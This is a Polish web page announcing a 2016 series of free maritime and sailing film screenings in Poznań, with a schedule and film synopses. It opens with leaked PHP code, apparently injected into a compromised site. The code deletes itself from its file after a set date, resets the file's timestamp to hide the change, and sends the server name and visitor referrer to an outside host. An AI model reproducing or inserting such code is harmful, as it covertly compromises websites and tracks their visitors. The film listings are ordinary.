check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727466){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Kino Wodna

Antarktyczna podróż Sir Ernesta Shackletona, 2010, 90 minut, USA

Wrzesień, 1914. Ernest Shackleton i 27 śmiałków ruszają na podbój Antarktydy z zamiarem połączenia mórz Rossa i Weddella śladem ludzkich stóp. Po sześciu tygodniach zmagań z oceanem trójmasztowiec „Endurance” zostaje uwięziony w paku lodowym na kolejnych 10 miesięcy. Dryfujące, niezdolna do samodzielnej żeglugi brygantyna zostaje zmiażdżona przez krę, zostawiając rozbitków na pastwę antarktycznej zimy.
Shackleton podejmuje szaleńczą próbę przebicia się do Georgii Południowej najpierw pieszo, następnie w 6 metrowej żaglowej szalupie ratunkowej „James Caird”. Alfred Lansing na podstawie dokumentów, dzienników i rozmów z uczestnikami odtwarza przebieg wyprawy dzień po dniu, dając świadectwo ludzkiej determinacji i bohaterstwa, które i wówczas, i dzisiaj jest prawie niemożliwe do powtórzenia.

 

Antarktyczna podroz 2

 

Wodniacko - marynistyczno - żeglarskie Kino „Wodna” 

w ramach programu Centrum Warte Poznania finansowanego przez Urząd Miasta Poznania

CWP 2016

 

Bezpłatne projekcje filmów marynistyczno – wodniacko – żeglarskich w Poznaniu na ulicy Wodnej 8/9 (WOZŻ) oraz w pobliżu rzeki Warty (Przystań Rzeczna w Starym Porcie).

Kino Wodna jest realizowane w ramach Konkursu Centrum Warte Poznania

Projekt zawdzięcza swą nazwę ulicy, przy której mieści się siedziba Wielkopolskiego Okręgowego Związku Żeglarskiego. Główną atrakcję stanowić będą bezpłatne projekcje filmów w plenerze w bliskim sąsiedztwie rzeki Warty. Naszym celem jest także kształtowanie odpowiednich postaw i zachowań pro wodniackich, poprzez dobór odpowiedniego repertuaru. Osobowości prezentowane w filmach (Sir Ernesta Shackletona, Karola Olgierta Borchardta i Mammerta Stankiewcza, kapitana i rekrutów największego żaglowca świata Kruzenszterna) są znane nie tylko w świecie wodniackim. Bogate życiorysy bohaterów, ze względu na walor edukacyjny są wzorem do naśladowania. Nawet prezentowana postawa Donalda Crowhursta – żeglarza samotnika, którego nieetyczne zachowanie miało dać mu upragnioną wygraną w regatach, pozwala na wyciągnięcie właściwych wniosków.

 

http://wtkplay.pl/video_frame.php?vid=26308&id=66745

 

 

Harmonogram wydarzeń

Lp.

Tytuł

Data projekcji

Czas trwania

Miejsce

1

Wyprawa Śmiały

23.06.2016

godz. 20:00 (zapisy)*

godz. 21:30 (wstęp wolny)

52 min

WOZŻ

ul. Wodna 8/9

2

Kruzenshtern

10.07.2016

godz. 21:30 (wstęp wolny)

54 min

Rzeka Warta (plener)

3

Kapitan Własnej Duszy

20.07.2016

godz. 21:30 (wstęp wolny)

52 min

Przystań Rzeczna

w Starym Porcie (tzw. cypel Warty) - plener

4

Na głęboką wodę

24.08.2016

godz. 21:00 (wstęp wolny)

93 min

Przystań Rzeczna

w Starym Porcie (tzw. cypel Warty) - plener

5

Raw Faith Głęboka wiara

02.09.2016

godz. 20:00 (wstęp wolny)

90 min

Przystań Rzeczna

w Starym Porcie (tzw. cypel Warty) - plener

6

Antarktyczna podróż Sir Ernesta Shackletona

21.10.2016

godz. 20:00 (wstęp wolny)

90 min

WOZŻ

ul. Wodna 8/9

 

 

 

Na głęboką wodę, 2006 rok, 90 minut, Anglia

Film „Na głęboką wodę” to historia podróży Donalda Crowhursta i jego udziału w najśmielszym, najbardziej nieprawdopodobnym w historii żeglarstwa wyścigu dookoła świata. To historia człowieka, dla którego spełnienie marzenia warte było najwyższej ceny. Film opowiedziany głosem Tildy Swinton to historia, która wydarzyła się podczas regat Sunday Times Golden Globe Race w 1968 roku.

Regaty samotników mają szczególny wymiar. Wyjątkowego nabrała historia jaka zdarzyła się w 1968 roku podczas okołoziemskiego wyścigu Golden Globe Race sponsorowanego przez londyńską gazetę Sanday Times. Wystartowało w nich dziewięciu sterników. W tym gronie znalazł się Donald Crowhurst. Zdesperowany biznesmen i żeglarz amator liczył na nagrodę w wysokości 5 tysięcy funtów za zwycięstwo. Chciał ratować podupadającą firmę. Jednak na otwartej wodzie zorientował się, że zdobycie zamierzonego przez niego celu jest niemożliwe. Mimo to, nie zrezygnował – postanowił poczekać na wyprzedzającą go flotę i podawać fałszywe pozycje jachtu. Jego oszustwo pozwoliło mu wirtualnie wyprzedzić pozostałych zawodników rejsu.

Skończyło się samobójstwem i stworzeniem niewiarygodnej historii, która stała się kanwą filmu „Na głęboką wodę” Louise Osmond i Jerry’ego Rothwella z 2006 roku. 

 

Kapitan Własnej Duszy, 1974-2012, 48 minut, Polska

 

Karol Olgierd Borchardt - Kapitan własnej duszy. jachtfilm


Jest to film o życiu pisarza marynisty, które zaczęło się w Moskwie, potem był Paryż i Wilno, gdzie się wychowywał pod opieką matki. Jest to także historia powstania Polskiej Szkoły Morskiej w Tczewie, kształcącej oficerów nieistniejącej jeszcze polskiej floty handlowej. Borchardt opowiada jak z powodów zdrowotnych nie dostał się za pierwszym razem do szkoły w Tczewie, i dopiero rok później, za osobistym wstawiennictwem Generała Mariusza Zaruskiego został do niej przyjęty. Jest to także film o historii portu w Gdyni, o marzeniach o morskiej potędze kraju, o Borchardtcie jako wykładowcy astronawigacji w szkole morskiej. Snują się w filmie żarty i opowieści Kapitana o początkach „Polski na morzu”. O generale Zaruskim, o trwającej dość krótko w życiu Borchardta przygodzie z żaglowcem Dar Pomorza, o problemach z mieszkaniem i zakazem pływania jaki otrzymał po powrocie do Polski w 1949 roku. Poznajemy kobiety które kochał, słyszymy opowieści o relacjach między Borchardtem a komendantem Daru Pomorza Kpt. Jurkiewiczu.

Największy jednak ślad w duszy i głowie młodego oficera marynarki wywarła osobowość kapitana Mamerta Stankiewicza i fascynacja jego osobą sięgająca jeszcze lat 20. i historii szkolnego barku Lwów. Transatlantyckie rejsy pod dowództwem „Znaczy kapitana” na M/s Piłsudski, i późniejsze zatonięcie statku na początku wojny zostawiły największy ślad w świadomości Borchardta. Na grobie poległego wraz ze swoim statkiem Kapitana Stankiewicza w Hartpool, K. O. Borchardt obiecuje, że napisze o nim książkę. W materiale zostało wykorzystanych bardzo dużo unikalnych starych fotografii i ujęć filmowych. Autora „Znaczy kapitana”, „Szamana morskiego”, czy „Kolebki nawigatorów” wspominają m.in. Kpt. Daniel Duda, kpt. Tadeusz Olechnowicz czy pisarz kapitan Tomasz Sobieszczański – Lobo. Bardzo dobry dokument, i każdy u kogo na półce stoi książka z marynarskim mankietem na okładce powinien go obejrzeć.

 

Wyprawa Śmiały, 1966 rok, 52 minuty, Polska (emisja w czwartek 23.06.2016 godz. 20:00 oraz 21:30)

Wyprawa Smialy 4

 

W roku 1965 rozpoczęła się jedna z pierwszych polskich dalekich wypraw żeglarskich. Miała charakter żeglarsko – naukowy. Jachtem dowodził słynny kapitan Bolesław Kowalski, a w załodze Śmiałego byli m.in. Ludomir Mączka, Jerzy Knabe, Tomasz Romer i jako kuk – kapitan Krzysztof Baranowski. Wyprawa na jachcie Śmiały doczekała się relacji książkowych, np. K. Baranowskiego „Kapitan kuk”. Jacht wyruszył ze Szczecina, przez Kanał Kiloński, Anglię, Wyspy Kanaryjskie, Cieśninę Magellana, kanały Patagonii, Kanał Panamski i ponownie przez wody starego kontynentu.

 

Kruzensztern, 2009 rok, 54 minuty, Polska (emisja w KontenerArt w niedzielę 10.07.2016 godz. 21:00)

 

Kruzenshtern filmy żeglarskie jachtfilm 2

Reżyser Maciej Cuske towarzyszy uczniom rosyjskiej Bałtyckiej Akademii Rybołówstwa w ich pierwszym w życiu szkoleniowym rejsie na pokładzie żaglowca Kruzensztern. Rejs rozpoczyna się w Kaliningradzie. Po przepłynięciu Bałtyku Kruzensztern wpływa na Morze Północne, kierując się do portu Bremerhaven. Stamtąd przez Kanał La Manche po miesiącu zawija do Santa Cruz na Teneryfie. Podczas rejsu powrotnego żaglowiec szkoleniowy zatrzymuje się w hiszpańskim Santander i niemieckim Roztocku. Ekipa filmowa towarzyszyła studentom akademii morskiej w dwóch etapach rejsu od Kaliningradu do Santa Cruz i od Rostocku do Kaliningradu. Film Kruzensztern to historia dojrzewania. Młodzi chłopcy, którzy marzą o morskich wyprawach po raz pierwszy wypływają w daleki rejs. To ma być sprawdzian. Dla nich i dla ich nauczycieli. Czy marzenia o morzu przetrwają trudną próbę życia i pracy na żaglowcu? Czy młodzi będą mogli godnie zastąpić tych, którzy przekazują im swoją wiedzę? Od chwili wejścia na pokład Kruzenszterna o wszystkim decyduje kapitan Novikov, młody, dobrze wykształcony i opanowany szef żaglowca. Novikov jest autorytetem dla młodych marynarzy, ale także dla doświadczonej załogi okrętu. Od jego decyzji zależy bezpieczeństwo na statku, dlatego każdy bezwzględnie podporządkowuje się jego rozkazom.

Morze nie lubi słabych. Kursanci od pierwszej chwili traktowani są przez załogę jak marynarze i muszą wykonywać powierzone im zadania. Pod okiem kilku wilków morskich, starszych bosmanów, pokonują kolejne stopnie wtajemniczenia w morze. Najbardziej niebezpieczne jest wejście na maszt. To próba, której chcą się poddać pomimo strachu, jaki w nich budzi. Ci, którym w końcu udaje się pokonać lęk, opowiadają pozostałym o niezwykłym przeżyciu: “Gdy stoisz na maszcie otacza cię wielki błękit, a nad tobą jest już tylko Bóg!” Czy chłopcy stali się mężczyznami? Czy przeszli przez tę próbę pomyślnie? Czy będą marynarzami? Czy starym wilkom morskim udało się przekazać młodym swoją pasję do morza? O tym opowiada film Kruzensztern polskiego reżysera Macieja Cuske. Pokazuje także jak wielką przygodą jest wyprawa na największym w świecie żaglowcu. Przygodą dla uczestników. I dla widzów.

Zapisz

http://wtkplay.pl/video_frame.php?vid=26308&id=66745

Zapisz

Zapisz